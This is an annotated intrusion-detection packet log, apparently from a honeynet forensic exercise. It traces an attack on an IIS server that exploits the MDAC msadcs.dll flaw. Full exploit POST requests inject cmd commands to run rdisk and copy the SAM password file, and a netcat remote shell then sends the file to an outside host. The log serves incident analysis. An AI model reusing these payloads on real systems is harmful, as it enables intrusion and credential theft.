***AP*** Seq: 0xB3D3A1EF Ack: 0x2CD48596 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 523..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 314..........x...S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c
.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t
.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r..
.m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Directory listing still shows same timestamps.
[**] netcat session 6969 [**]
02/04-06:06:44.136769 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:63357 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF580B Ack: 0x9E4401B8 Win: 0x214E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:05a
...02/04/01 07:05a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:44.663678 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:63613 IpLen:20 DgmLen:624 DF
***AP*** Seq: 0x2CBF58D3 Ack: 0x9E4401B8 Win: 0x214E TcpLen: 20
/01 07:05a 827,392 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..11/26/00 06:43p 14,946 ntuser.da_..11/26
/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 50,4
05 setup.log..11/26/00 06:43p 124,776 software._.
. 11 File(s) 1,046,803 bytes..
1,690,111,488 bytes free....C:\WINNT\repair>..C:\WINNT
\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:47.451806 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64125 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF5B1B Ack: 0x9E4401BD Win: 0x2149 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:05a
...02/04/01 07:05a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:47.988507 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64381 IpLen:20 DgmLen:624 DF
***AP*** Seq: 0x2CBF5BE3 Ack: 0x9E4401BD Win: 0x2149 TcpLen: 20
/01 07:05a 827,392 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..11/26/00 06:43p 14,946 ntuser.da_..11/26
/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 50,4
05 setup.log..11/26/00 06:43p 124,776 software._.
. 11 File(s) 1,046,803 bytes..
1,690,095,104 bytes free....C:\WINNT\repair>..C:\WINNT
\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:50.556251 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:65149 IpLen:20 DgmLen:45 DF
***AP*** Seq: 0x2CBF5E2B Ack: 0x9E4401C2 Win: 0x2144 TcpLen: 20
dir..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:51.090707 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:65405 IpLen:20 DgmLen:819 DF
***AP*** Seq: 0x2CBF5E30 Ack: 0x9E4401C2 Win: 0x2144 TcpLen: 20
Volume in drive C has no label... Volume Serial Number is 8403-
6A0E.... Directory of C:\WINNT\repair....02/04/01 07:05a
...02/04/01 07:05a ....02
/04/01 07:05a 827,392 $$hive$$.tmp..10/13/96 07:
38p 438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677
default._..11/26/00 06:43p 14,946 ntuser.da_..11
/26/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 5
0,405 setup.log..11/26/00 06:43p 124,776 software
._.. 11 File(s) 1,046,803 bytes..
1,690,060,288 bytes free....C:\WINNT\repair>..C:\WI
NNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk -s/
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:07:04.670041 213.116.251.162:1970 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13616 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB42A3C27 Ack: 0x2CD4DD18 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. .-.s./.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# And again uses MDAC vulnerability to run rdisk -s/
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:07:10.835281 213.116.251.162:1972 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13628 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB443ACC4 Ack: 0x2CD4F531 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. .-.s./.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to try rdisk /s-
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:07:32.586022 213.116.251.162:1974 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13640 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB4979F1E Ack: 0x2CD549E2 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. ./.s.-.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:34.978045 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9342 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF613B Ack: 0x9E4401C7 Win: 0x213F TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:06a
...02/04/01 07:06a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# But a directory listing shows the same old timestamps
[**] netcat session 6969 [**]
02/04-06:07:35.542711 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9598 IpLen:20 DgmLen:622 DF
***AP*** Seq: 0x2CBF6203 Ack: 0x9E4401C7 Win: 0x213F TcpLen: 20
/01 07:05a 3,469,312 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..02/04/01 07:06a 14,946 ntuser.da_..11/26
/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 50,4
05 setup.log..02/04/01 07:05a 177,732 system._..
11 File(s) 3,741,679 bytes..
1,687,127,552 bytes free....C:\WINNT\repair>..C:\WINNT\r
epair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:38.437935 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10622 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF6449 Ack: 0x9E4401CC Win: 0x213A TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:06a
...02/04/01 07:06a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:38.937066 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10878 IpLen:20 DgmLen:571 DF
***AP*** Seq: 0x2CBF6511 Ack: 0x9E4401CC Win: 0x213A TcpLen: 20
/01 07:05a 3,469,312 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..11/26/00 06:43p 4,593 sam._..11/26/00
06:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..02/04/01 07:05a 177,73
2 system._.. 10 File(s) 3,726,733 bytes..
1,687,082,496 bytes free....C:\WINNT\repair
>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to try rdisk /s-
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:07:50.813538 213.116.251.162:1976 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13666 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB4DEEFC4 Ack: 0x2CD59132 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. ./.s.-.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Again no change in the timestamps
[**] netcat session 6969 [**]
02/04-06:07:52.003699 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:13950 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF6724 Ack: 0x9E4401D1 Win: 0x2135 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:06a
...02/04/01 07:06a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:52.663693 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:14462 IpLen:20 DgmLen:622 DF
***AP*** Seq: 0x2CBF67EC Ack: 0x9E4401D1 Win: 0x2135 TcpLen: 20
/01 07:05a 3,469,312 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..02/04/01 07:06a 14,946 ntuser.da_..11/26
/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 50,4
05 setup.log..02/04/01 07:05a 177,732 system._..
11 File(s) 3,741,679 bytes..
1,686,932,480 bytes free....C:\WINNT\repair>..C:\WINNT\r
epair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:56.633119 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:14974 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF6A32 Ack: 0x9E4401D6 Win: 0x2130 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:06a
...02/04/01 07:06a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:57.165602 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15486 IpLen:20 DgmLen:571 DF
***AP*** Seq: 0x2CBF6AFA Ack: 0x9E4401D6 Win: 0x2130 TcpLen: 20
/01 07:05a 3,469,312 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..11/26/00 06:43p 4,593 sam._..11/26/00
06:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..02/04/01 07:05a 177,73
2 system._.. 10 File(s) 3,726,733 bytes..
1,686,871,552 bytes free....C:\WINNT\repair
>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk /s-
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:08:32.947786 213.116.251.162:1979 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13695 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB5813614 Ack: 0x2CD635BB Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. ./.s.-.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to read the compressed sam (c:\winnt\repair\sam._) into the file 'c:\har.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:08:36.838939 213.116.251.162:1981 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13706 IpLen:20 DgmLen:785 DF
***AP*** Seq: 0xB591FFF4 Ack: 0x2CD64506 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 591..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 382..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .t
.y.p.e. .c.:.\.w.i.n.n.t.\.r.e.p.a.i.r.\.s.a.m..._. .>.>.c.:.\.h
.a.r...t.x.t.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A
.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n
.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m
.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:41.269150 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22142 IpLen:20 DgmLen:80 DF
***AP*** Seq: 0x2CBF6D0D Ack: 0x9E4401DA Win: 0x212C TcpLen: 20
c:....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# A directory listing shows that the timestamps have changed (Is the system clock off???)
[**] netcat session 6969 [**]
02/04-06:08:42.109830 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22654 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF6D35 Ack: 0x9E4401DF Win: 0x2127 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:07a
...02/04/01 07:07a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:42.645452 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22910 IpLen:20 DgmLen:624 DF
***AP*** Seq: 0x2CBF6DFD Ack: 0x9E4401DF Win: 0x2127 TcpLen: 20
/01 07:07a 827,392 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..02/04/01 07:07a 16,275 def
ault._..02/04/01 07:07a 14,946 ntuser.da_..02/04
/01 07:07a 5,327 sam._..02/04/01 07:07a
10,111 security._..11/26/00 06:54p 50,4
05 setup.log..02/04/01 07:07a 686,053 software._.
. 11 File(s) 1,613,457 bytes..
1,689,496,576 bytes free....C:\WINNT\repair>..C:\WINNT
\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:44.005648 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23422 IpLen:20 DgmLen:45 DF
***AP*** Seq: 0x2CBF7045 Ack: 0x9E4401E4 Win: 0x2122 TcpLen: 20
cd\..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:44.542113 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23678 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0x2CBF704A Ack: 0x9E4401E4 Win: 0x2122 TcpLen: 20
..C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:45.394693 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:24190 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF7056 Ack: 0x9E4401E9 Win: 0x211D TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:45.943309 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:24446 IpLen:20 DgmLen:807 DF
***AP*** Seq: 0x2CBF711E Ack: 0x9E4401E9 Win: 0x211D TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..02/04/01 07:07a
5,327 har.txt..12/07/00 03:30p InetP
ub..12/07/00 03:12p Multimedia Files..12/
26/00 07:10p New Folder..01/26/01 02:10p
78,643,200 pagefile.sys..12/21/00 08:59p Program Files..02/04/01 06:49a 6
9 README.NOW.Hax0r..12/21/00 08:59p TEMP.
.02/04/01 07:05a WINNT..12/26/00 07:09p
wiretrip..02/04/01 06:43a
0 yay.txt.. 15 File(s) 78,648,918 bytes..
1,689,455,616 bytes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Navigates remote shell back to 'c:\'. Reads file har.txt
[**] netcat session 6969 [**]
02/04-06:08:51.092457 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:26494 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBF741D Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
type har.txt..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.196146 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:26750 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x2CBF742B Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
MSCF............,...................I........`........D*.h .$$hi
ve$$.tmp.....~..`CK..t.5........x?..../.)..6.c..C.....6h.u9.-.P.Cv..p..u.
..o...#....YE\......"..90r._...~..j....ZFm... .....7>NC..T......
.....w,..f..|..Yb|...8[..e.g=..a..,.......r.j.....c..g.z....Z.f.
.....q...{....c8..o......M.j#.....\.;...\.
{'\"...I..,.'...#.z.|8.fc...v....}....[...ZV.A.....K.o../.Wmgg..
/6.x.Cy#..%.k..<[..!N_~...L....:AqW.......C..^..::.RW...R..O.-o.
....x..Fkr.x>..3....5.+.q,cz[i.m.a.S-._.......l+?=@r8.=.e.._.;.v
6k..*/~e).i..=........ g..<.......p......H-............1.......m
..g.$=..I..Z&......=.....(...ev.pq."...v8..?.....2..z>...b.i.kj...
P.<.....>'4.x..U.e.{J..J.*......*.K.*..e.*.oOieUE.w.....G~.Y...&
..tr....-..Y'...VN..yT./...T...<....#.[.....Y......Cy...4.D.>...
R...p.3}MS8.(Q".HCH..<....a.^.2.yj.e.a.'.>E.....Gc....7....k.."Q
...3.....W.[...rE.....7.......U.......h.....H.?.e.l.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.196158 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27006 IpLen:20 DgmLen:186 DF
***AP*** Seq: 0x2CBF79DF Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
..........o.$e...".z..)v...............v..t>...G..O&..9..^......
...2...UR.b..[..`..B&O.k$\.^1..Zm.7E.$....>.V...m..Vh..../`k...<
2.............gQ|.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.199957 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27262 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x2CBF7A71 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
....8..\5.^..C.......gi...a.\..........A.....R.\......^....6H.q}
.tt{.L.j..b..T..^.........w].gq>..>.)...Qb..".;`z....3....'..L..
Z.(.....a.S-..?.....b.q.P.\.|%...o-F.x.....{.>...xus..S....U....
-..M._|2.z.0..\.v.....29...._...v._F..?.Y..........2O.....jZ....
.].......v..v)......g8\f8....1a/%.........3.._............733.\.
..f...Y..~.*duZ........(#..|.D.....>.m.Y.f.+.bW...>..M.a.ogu.pM.
..7...\X.:o8..5z9R...%e.|B.......e.._Fm1.oj.z..].....P.......V..
......0....Z..`..rY6...W..^Q|.^...y......f...K+..2D..P...(g.P.8.
.z..mM...k|nz.Z1..;...^...ZG.....t..l.H)...o.....o`.=...........
).J'..a....6.rm..../.;F..../%...}.3..*_.....}.[.-....M..........
...L....;V;.....k.P.q.....f...(...S..<(.Q..<..m/+..j.#.....T....
m ..........p?.{.'jCy...BvK}..e}..d...."-.......(#?)....^Zh.S..o.:..7[G..<.....m2..$.Ml..A...[....
/.=..../._o}..W...*...\n%..'.....^..7...o+.....1.-.Q.9.-.~D8....
